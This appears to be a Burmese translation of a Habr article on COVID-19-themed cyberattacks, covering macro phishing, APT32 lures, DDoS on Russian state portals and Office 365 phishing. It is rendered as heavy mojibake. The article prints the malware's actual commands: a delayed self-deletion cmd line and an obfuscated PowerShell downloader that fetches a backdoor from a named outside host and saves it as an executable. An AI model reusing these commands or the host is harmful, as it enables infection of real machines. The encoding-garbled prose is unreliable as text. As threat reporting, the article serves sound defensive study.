ááá¯ááºááá¯ááºáá°áá»á¬ážááẠCOVID-19 áá±á«ááºážá
ááºááᯠáááºáááºá¡áá¯á¶ážáá»áᬠáááºáá±á¬áá«ááŸáá·áºáááºáááºááá·áºá¡áá¬á¡á¬ážáá¯á¶ážááᯠá
áááºáá«áááºá
á¬ážáá±á¬ áá¯á¶ážá
áœá²áá°áá»á¬ážá¡ááœáẠááŒáááºážááŒá±á¬ááºááŸá¯áá»á¬áž ááá¯áá»á¬ážáá¬á
á±áááºá IN
áá²ááŸá¬ ááŸááºáá¬ážáá«á
áááºááẠCOVID-19 á¡ááœáẠá¡ááá²á·á ááºážáááºááŸá¯ ááŒá¯áá¯ááºááá¯áá«ááá¬ážá
coronavirus-themed phishing ááá±á¬ááºáááºáááºááŸá¬ážáá±á¬á¥ááá¬ááŸá¬
Macros ááá¯ááœáá·áºááẠá¡áá¯á¶ážááŒá¯áá°á¡áá»á¬ážá á¯ááᯠááœá²áá±á¬ááºááŒááºážáááºáááºáž ááœááºáá°áá«áááºá áááºážááá¯áá¯ááºáá±á¬ááºáááºá á á¶ááŸáá·áºááœááºááá¯á¡áá¯á¶ážááŒá¯áá²á·áááº- áá±ážááœááºážááœáŸá¬ááá¯ááŒáá·áºáááºá áááºááẠáŠážá áœá¬ macros ááá¯ááœáá·áºááẠááá¯á¡ááºáááºá ááá¯ááá¯áááºááŸá¬ áááºááẠVBA script ááᯠrun áááºááá¯á¡ááºáááºá
áááºááœá±á·ááŒááºáááá·áºá¡ááá¯ááºážá VBA script ááᯠantiviruses áá»á¬ážá០á¡áá°ážáá¯á¶ážááœááºáá¬ážáááºá
Windows ááœáẠá¡ááá®áá±ážááŸááºážááẠáá¯á¶áá± âYesâ á¡ááŒá±ááᯠáááºáá¶ááŒááºážáááŒá¯áá® /T <á
áá¹ááá·áº> á
á±á¬áá·áºááá¯ááºážááá·áº á¡ááºá¹áá«áááºáá
áºáá¯ááŸááááºá áá»áœááºá¯ááºááá¯á·áá¡ááŒá±á¡áá±ááœááºá áá¬ááºááœáŸááºážááẠáá¬áá®ááá¯ááºáá»á¬ážááá¯ááá»ááºáá® 65 á
áá¹ááá·áºá
á±á¬áá·áºáá²á·áááº-
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
á
á±á¬áá·áºááá¯ááºážáá±á
ááºááœáẠmalware ááᯠáá±á«ááºážáá¯ááºáá¯ááºáá²á·áááºá á€á¡ááœáẠá¡áá°áž PowerShell script ááᯠá
áááºááá¯ááºáááº-
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 áááºááá¯ážááᯠáá¯ááºáá»ááºááŒá®ážáá±á¬ááºá PowerShell script ááẠáá»á¬ááá®á០ááááºá áááºááºáá¶ááá±á¬ áááºáá¬áá¬ááœááºááŸááá±á¬ backdoor ááᯠáá±á«ááºážáá¯ááºáá¯ááºáááº-
http://automatischer-staubsauger.com/feature/777777.png
á¡áááºá¡á±á¬ááºááœáẠááááºážáááºážáá«á
C:UsersPublictmpdirfile1.exe
ááá¯áá»ááŸá² âC:UsersPublictmpdirâ
command áá«ááŸááá±á¬ 'tmps1.bat' ááá¯ááºááᯠrun áá±á¬á¡áá« áá»ááºáá
áºáááºá cmd /c mkdir ""C:UsersPublictmpdir"".
á¡á áá¯ážááá¬ááá»á¬ážááᯠáá áºááŸááºáá¬áž ááá¯ááºááá¯ááºáá²á·áááºá
ááá¯á·á¡ááŒáẠFireEye áá±á·áá¬áááºážá
á
áºáá°áá»á¬ážááẠWuhan ááŸá á¡á
áá¯ážáá¡áá±á¬ááºá¡áŠáá»á¬ážááŸáá·áº ááá¯áẠá¡áá±ážáá±á«áºá
á®áá¶ááá·áºááœá²ááŸá¯áááºááŒá®ážáá¬áááá¯á·ááᯠáááºááœááºááá·áº APT32 ááá¯ááºááá¯ááºááŸá¯ááᯠáááŒá¬áá±ážáá®á á¡á
á®áááºáá¶áááºááŒáá²á·áááºá ááŒáá·áºáá±áá¬ážáá±á¬ RTF áá»á¬ážáá²á០áá
áºáá¯ááœáẠáá±á«ááºážá
ááºáááºáá¬ážáá±á¬ New York Times áá±á¬ááºážáá«ážáá
áºáá¯ááá¯á· ááá·áºááºáá
áºáá¯áá«ááŸááááºá
á áááºáááºá á¬ážá áá¬ááŸá¬á ááŸá¬ááœá±ááœá±á·ááŸáááá·áºá¡áá»áááºááœááºá Virustotal áá¡ááá¯á¡á á€á¥ááá¬ááᯠááá¯ááºážáááºá áºááá¯ážááœáŸá¬ážáá áºáá¯á០áááœá±á·ááŸááá²á·áá«á
ááá¬ážááẠáááºááá¯ááºááœá± áá»ááºáá²á·á¡áá«
áá¯ááŸá¬ážááœáẠááŒá¬ážáá±á¬ááºážáá±á¬ ááá¯ááºááá¯ááºááŸá¯á á¡áá°ážááŒá¬ážáá¯á¶áž á¥ááá¬ááŸá¬ ááá±á·ááá±á·áááẠááŒá áºáá²á·áááºá áááºážá¡ááœáẠá¡ááŒá±á¬ááºážáááºážááŸá¬ á¡ááẠá ááŸá áºá០áá ááŸá áºááŒá¬áž ááá±ážáá»á¬ážá¡ááœáẠááŸá áºááŸááºááá»á¬áž á á±á¬áá·áºáá»áŸá±á¬áºáá²á·áá±á¬ á¡áá»áá¯ážáá¶á á¬ážááœáá·áºááᯠááá·áºá¡ááºáááŒááºáž ááŒá áºáááºá áá»áŸá±á¬ááºááœáŸá¬áá»á¬ážáááºáá¶ááŒááºážááᯠáá±á 3 áááºá 16 ááœááºááŒá±ááŒá¬áá±á¬á¡áá« áááºážáá±á«ááºážáá»á¬ážá áœá¬ááẠáá¬áááŒá¬ááŸááºá á±á¬áá·áºááá¯ááºážáá²á·ááá±á¬á¡áá°á¡áá®á¡ááœáẠState Services áááºááá¯ááºááá¯á· á¡ááŒá±ážá¡ááœáŸá¬ážáá±á¬ááºááŸááá¬ááŒááŒá®áž ááá±á¬áºáááºááŸááºááẠDDoS ááá¯ááºááá¯ááºááŸá¯ááẠááá¯ááá¯ážááŒááºážáááŸááá±á¬ portal ááᯠááŒá¯ááºáá»áá²á·áááºá âá¡á áá¯ážááááºáá±á¬ááºááŸá¯áá»á¬ážááẠáá»áŸá±á¬ááºááœáŸá¬á á®ážáááºážááŸá¯ááᯠááááºážáá»á±á¬ááºážááá¯ááºáááºááá¯ááºâ áᯠááá¹ááá ááŒá±á¬ááŒá¬ážáá±á¬á¡áá«ááœáẠáá°áá»á¬ážááẠáá»áŸá±á¬ááºááœáŸá¬áááºáá¶ááŒááºážá¡ááœáẠá¡á á¬ážááá¯ážááá¯ááºáá áºáᯠá áááºááŒááºážá¡ááŒá±á¬ááºáž á¡áœááºááá¯ááºážááœáẠááŒá±á¬ááá¯áá¬ááŒáááºá
ááŒá¿áá¬ááŸá¬ ááá¯ááºáá»á¬ážá
áœá¬ááẠáá
áºááŒáá¯ááºáááºáááºáž á
áááºáá¯ááºáá±á¬ááºáá±ááŒá®áž áá
áºáá¯ááŒá
áºááá·áº posobie16.gosuslugi.ru ááœáẠá¡ááŸááºáááẠá¡ááºááºáá®áá±ážááŸááºážáá»á¬ážááᯠá¡ááŸááºáááẠáááºáá¶áá±áá»áááºááœááºá
SearchInform ááŸáá¯ááºáá±á¬áºááá¯ááºáááºáá»á¬ážááẠ.ru áá¯ááºááŸá ááááºáááºáá±á¬ááá¯ááááºážá¡áá Ạ30 ááá·áºááᯠááœá±á·ááŸááá²á·áááºá Infosecurity ááŸáá·áº Softline áá¯áá¹ááá®ááá¯á·ááẠá§ááŒá®áá¡á ááááºážá á¡áá¬ážáá° á¡á áá¯ážááááºáá±á¬ááºááŸá¯ áááºááºááá¯áẠáá áá»á±á¬áºááᯠááŒá±áá¬áá¶áá²á·áááºá áááºážááá¯á·ááááºáá®ážáá°áá»á¬ážááẠáááºážááŸá®ážáá±á¬áááºá¹áá±ááá»á¬ážááᯠááŒááºááŸááºááŒá®áž gosuslugiá gosuslugi-70á vyplatyá covid-vyplatyá posobie á áááºááŒáá·áº á áá¬ážáá¯á¶ážáá»á¬ážááᯠáá±á«ááºážá ááºá¡áá¯á¶ážááŒá¯áá«áááºá
Hype ááŸáá·áºáá°ááŸá¯áá±ážá¡ááºáá»ááºáá®áá¬
á€ááá°áá¬áá»á¬ážá¡á¬ážáá¯á¶ážááẠááá¯ááºááá¯ááºáá°áá»á¬ážááẠcoronavirus áá¡ááŒá±á¬ááºážá¡áá¬ááᯠá¡á±á¬ááºááŒááºá áœá¬ááœá±ááŸá¬áá±ááŒá±á¬ááºáž á¡áááºááŒá¯áá¯á¶áá¬ááŒá áºáááºá áá°ááŸá¯áá±ážáááºážáá¬ááŸá¯ ááŒáá·áºáá¬ážáá±ááŸáá·áº áááŸááºážáááºážáá±á¬ ááŒá¿áá¬áá»á¬áž ááá¯áá»á¬ážáá±áá±á ááááºáááºááŸáá·áºááŒá¬ážáá°áá»á¬ážááẠá¡áá±ážááŒá®ážáá±á¬ áá±áá¬ááᯠááá¯ážáá°áááºá áá°áá»á¬ážá¡á¬áž áááºážááá¯á·á ááá¯ááºáá¶ááᯠáááºážááá¯á·ááá¯ááºááá¯áẠá áœáá·áºááœáŸááºááẠá¡áááºážá¡áá»ááºááá¯ááºážá á±ááŒááºáž ááá¯á·ááá¯áẠááœááºááŒá°áá¬áá»á¬ážááᯠáááºááºáá¯ááºááẠá¡ááœáá·áºá¡áááºáž ááá¯áá»á¬ážáá±áá±ááŒá áºáááºá
áááºáá±á¬áá«ááŒá±á¬áá·áº ááŒáá¯áááºááŒááºáááºáá¬ážááŒááºážáááŸááá±á¬ áá°áá»á¬ážááᯠá¡áááºááœááºážá០á¡áá¯ááºááá¯ááºážá
á±ááŒááºážááŒáá·áº ááá¯ááºáá±ážááá¯ááºáá¬áá¬áá áá±á¬áºááá¯ááááºáá±áá¬ááá¯áá« á¡áá¹ááá¬ááºááŒá
áºá
á±áá«áááºá á¥ááá¬á¡á¬ážááŒáá·áºá áááŒá¬áá±ážáá®á Microsoft 365 (áááẠOffice 365) á¡áá¯á¶ážááŒá¯áá°áá»á¬ážáááºáááºáž phishing ááá¯ááºááá¯ááºááŸá¯ááᯠáá¶áá²á·ááááºá áá°áá»á¬ážááẠááŒá®ážáá¬ážáá±á¬ "ááœááºááœá¬ážáááº" á¡áá¶áááºáá±á·áá»áºáá»á¬ážááᯠá
á¬áá»á¬ážááŸáá·áºááœá²áááºááŸá¯á¡ááŒá
Ạáááºáá¶áááŸááá²á·áááºá ááá¯á·áá¬ááœááºá ááá¯ááºáá»á¬ážááẠá¡ááŸááºááááºá¡á¬ážááŒáá·áº ááá¯ááºááá¯ááºáá¶ááá°áá»á¬ážáá¶ááá¯á· áá±ážááá¯á·áá±á¬ HTML á
á¬áá»ááºááŸá¬áá
áºáá¯ááŒá
áºáááºá
source: www.habr.com